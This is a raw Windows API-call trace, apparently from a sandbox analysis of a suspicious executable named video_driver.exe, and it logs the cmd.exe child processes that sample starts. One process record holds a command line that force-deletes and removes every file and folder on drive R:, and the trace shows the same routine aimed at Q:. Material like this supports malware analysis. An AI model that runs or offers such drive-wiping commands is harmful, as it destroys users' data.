[0064.983] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.983] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.983] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.983] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.983] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.984] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.984] GetProcessHeap () returned 0x430000 [0064.984] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x442bd0 | out: hHeap=0x430000) returned 1 [0064.984] GetEnvironmentStringsW () returned 0x442310* [0064.984] GetProcessHeap () returned 0x430000 [0064.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xae2) returned 0x444c70 [0064.984] FreeEnvironmentStringsW (penv=0x442310) returned 1 [0064.984] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.984] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.984] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.984] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.984] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.984] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.984] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.984] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.984] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.984] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.984] GetProcessHeap () returned 0x430000 [0064.984] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x4417c8 [0064.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efaa0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2efaa0, lpFilePart=0x2efa9c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2efa9c*="Desktop") returned 0x25 [0064.984] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef81c | out: lpFindFileData=0x2ef81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x445760 [0064.985] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0064.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef81c | out: lpFindFileData=0x2ef81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x445760 [0064.985] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0064.985] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef81c | out: lpFindFileData=0x2ef81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x445760 [0064.985] FindClose (in: hFindFile=0x445760 | out: hFindFile=0x445760) returned 1 [0064.985] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.985] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.985] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.985] GetProcessHeap () returned 0x430000 [0064.985] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x444c70 | out: hHeap=0x430000) returned 1 [0064.985] GetEnvironmentStringsW () returned 0x444180* [0064.985] GetProcessHeap () returned 0x430000 [0064.985] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xb36) returned 0x445fa0 [0064.986] FreeEnvironmentStringsW (penv=0x444180) returned 1 [0064.986] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.986] GetProcessHeap () returned 0x430000 [0064.986] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4417c8 | out: hHeap=0x430000) returned 1 [0064.986] GetProcessHeap () returned 0x430000 [0064.986] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400e) returned 0x446ae0 [0064.986] GetProcessHeap () returned 0x430000 [0064.986] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa0) returned 0x442e50 [0064.986] GetProcessHeap () returned 0x430000 [0064.986] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0064.986] GetConsoleOutputCP () returned 0x1b5 [0064.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.986] GetUserDefaultLCID () returned 0x409 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efbe0, cchData=128 | out: lpLCData="0") returned 2 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efbe0, cchData=128 | out: lpLCData="0") returned 2 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efbe0, cchData=128 | out: lpLCData="1") returned 2 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0064.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0064.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0064.988] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.989] GetProcessHeap () returned 0x430000 [0064.989] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20c) returned 0x442ef8 [0064.989] GetConsoleTitleW (in: lpConsoleTitle=0x442ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0064.989] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.989] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.989] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.990] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.990] GetProcessHeap () returned 0x430000 [0064.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x400a) returned 0x446ae0 [0064.990] GetProcessHeap () returned 0x430000 [0064.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0064.990] GetProcessHeap () returned 0x430000 [0064.990] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x4457e0 [0064.990] GetEnvironmentVariableW (in: lpName="p IN (\"Q", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="CD") returned 13 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="ERRORLEVEL") returned 11 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="CMDEXTVERSION") returned 13 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="CMDCMDLINE") returned 13 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="DATE") returned 12 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="TIME") returned -4 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="RANDOM") returned -2 [0064.991] _wcsicmp (_String1="p IN (\"Q", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.991] GetProcessHeap () returned 0x430000 [0064.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4457e0 | out: hHeap=0x430000) returned 1 [0064.991] GetProcessHeap () returned 0x430000 [0064.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0064.991] GetProcessHeap () returned 0x430000 [0064.991] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4008) returned 0x44aaf8 [0064.991] GetProcessHeap () returned 0x430000 [0064.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44aaf8 | out: hHeap=0x430000) returned 1 [0064.991] GetProcessHeap () returned 0x430000 [0064.991] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x446ae0 | out: hHeap=0x430000) returned 1 [0064.991] _wcsicmp (_String1="if", _String2=")") returned 64 [0064.991] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0064.991] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0064.991] _wcsicmp (_String1="IF", _String2="if") returned 0 [0064.991] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0064.991] GetProcessHeap () returned 0x430000 [0064.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443110 [0064.992] GetProcessHeap () returned 0x430000 [0064.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x43ffc0 [0064.992] GetProcessHeap () returned 0x430000 [0064.992] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0064.992] GetProcessHeap () returned 0x430000 [0064.992] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x16) returned 0x441800 [0064.992] GetProcessHeap () returned 0x430000 [0064.992] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x441800) returned 0x16 [0064.992] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0064.993] GetProcessHeap () returned 0x430000 [0064.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443170 [0064.993] GetProcessHeap () returned 0x430000 [0064.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4431d0 [0064.993] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0064.993] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0064.993] GetProcessHeap () returned 0x430000 [0064.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4431f0 [0064.993] GetProcessHeap () returned 0x430000 [0064.993] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x4457e0 [0064.993] GetProcessHeap () returned 0x430000 [0064.993] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4457e0, Size=0x14) returned 0x443210 [0064.994] GetProcessHeap () returned 0x430000 [0064.994] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x443210) returned 0x14 [0064.994] _wcsicmp (_String1="del", _String2=")") returned 59 [0064.994] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0064.994] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0064.994] _wcsicmp (_String1="IF", _String2="del") returned 5 [0064.994] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0064.994] _wcsicmp (_String1="REM", _String2="del") returned 14 [0064.994] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0064.994] GetProcessHeap () returned 0x430000 [0064.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443230 [0064.994] GetProcessHeap () returned 0x430000 [0064.994] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x10) returned 0x43ffd8 [0064.995] GetProcessHeap () returned 0x430000 [0064.995] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x443290 [0064.995] GetProcessHeap () returned 0x430000 [0064.995] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x4432c0 [0064.996] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0064.996] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0064.996] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0064.996] GetProcessHeap () returned 0x430000 [0064.996] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443320 [0064.996] GetProcessHeap () returned 0x430000 [0064.996] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x443380 [0064.997] GetProcessHeap () returned 0x430000 [0064.997] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4433d0 [0064.997] GetProcessHeap () returned 0x430000 [0064.997] RtlReAllocateHeap (Heap=0x430000, Flags=0x0, Ptr=0x4433d0, Size=0x12) returned 0x4433d0 [0064.997] GetProcessHeap () returned 0x430000 [0064.997] RtlSizeHeap (HeapHandle=0x430000, Flags=0x0, MemoryPointer=0x4433d0) returned 0x12 [0064.997] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0064.997] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0064.997] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0064.997] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0064.997] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0064.997] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0064.998] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0064.998] GetProcessHeap () returned 0x430000 [0064.998] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4433f0 [0064.999] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.000] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.000] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.000] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.000] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.000] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.000] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.000] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.000] GetProcessHeap () returned 0x430000 [0065.000] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x58) returned 0x443410 [0065.000] GetProcessHeap () returned 0x430000 [0065.000] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x443470 [0065.000] GetProcessHeap () returned 0x430000 [0065.000] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x20) returned 0x4457e0 [0065.002] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.003] GetFullPathNameW (in: lpFileName="Q:", nBufferLength=0x208, lpBuffer=0x2ef8d0, lpFilePart=0x2ef67c | out: lpBuffer="Q:\\", lpFilePart=0x2ef67c*=0x0) returned 0x3 [0065.004] wcsncmp (_String1="Q:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -11 [0065.008] GetFileAttributesW (lpFileName="Q:\\" (normalized: "q:")) returned 0xffffffff [0065.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.008] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.008] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.009] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.009] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.009] SetConsoleInputExeNameW () returned 0x1 [0065.009] GetConsoleOutputCP () returned 0x1b5 [0065.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.009] exit (_Code=0) Process: id = "38" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4221d000" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0xb0 [0065.137] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8a4 | out: lpSystemTimeAsFileTime=0x18f8a4*(dwLowDateTime=0x4a3ade0, dwHighDateTime=0x1d62400)) [0065.137] GetCurrentProcessId () returned 0xb9c [0065.137] GetCurrentThreadId () returned 0xb0 [0065.137] GetTickCount () returned 0x1147b96 [0065.137] QueryPerformanceCounter (in: lpPerformanceCount=0x18f89c | out: lpPerformanceCount=0x18f89c*=18527196471) returned 1 [0065.140] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.140] __set_app_type (_Type=0x1) [0065.140] __p__fmode () returned 0x770331f4 [0065.140] __p__commode () returned 0x770331fc [0065.141] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.141] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.141] GetCurrentThreadId () returned 0xb0 [0065.141] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0) returned 0x60 [0065.141] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.142] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.142] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.142] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.142] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f834 | out: phkResult=0x18f834*=0x0) returned 0x2 [0065.142] VirtualQuery (in: lpAddress=0x18f86b, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.142] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.142] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.143] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.143] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f804, dwLength=0x1c | out: lpBuffer=0x18f804*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.143] GetConsoleOutputCP () returned 0x1b5 [0065.143] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.143] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.143] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.143] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.144] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.144] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.144] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.145] GetEnvironmentStringsW () returned 0x3220f8* [0065.145] GetProcessHeap () returned 0x310000 [0065.145] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xaca) returned 0x322bd0 [0065.145] FreeEnvironmentStringsW (penv=0x3220f8) returned 1 [0065.145] GetProcessHeap () returned 0x310000 [0065.145] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4) returned 0x321898 [0065.145] GetEnvironmentStringsW () returned 0x3220f8* [0065.145] GetProcessHeap () returned 0x310000 [0065.145] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xaca) returned 0x3236a8 [0065.146] FreeEnvironmentStringsW (penv=0x3220f8) returned 1 [0065.146] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x68) returned 0x0 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.146] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.146] RegCloseKey (hKey=0x68) returned 0x0 [0065.146] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7a4 | out: phkResult=0x18e7a4*=0x68) returned 0x0 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x40, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x0, lpData=0x18e7b0*=0x1, lpcbData=0x18e7a8*=0x1000) returned 0x2 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x0, lpcbData=0x18e7a8*=0x4) returned 0x0 [0065.147] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7ac, lpData=0x18e7b0, lpcbData=0x18e7a8*=0x1000 | out: lpType=0x18e7ac*=0x4, lpData=0x18e7b0*=0x9, 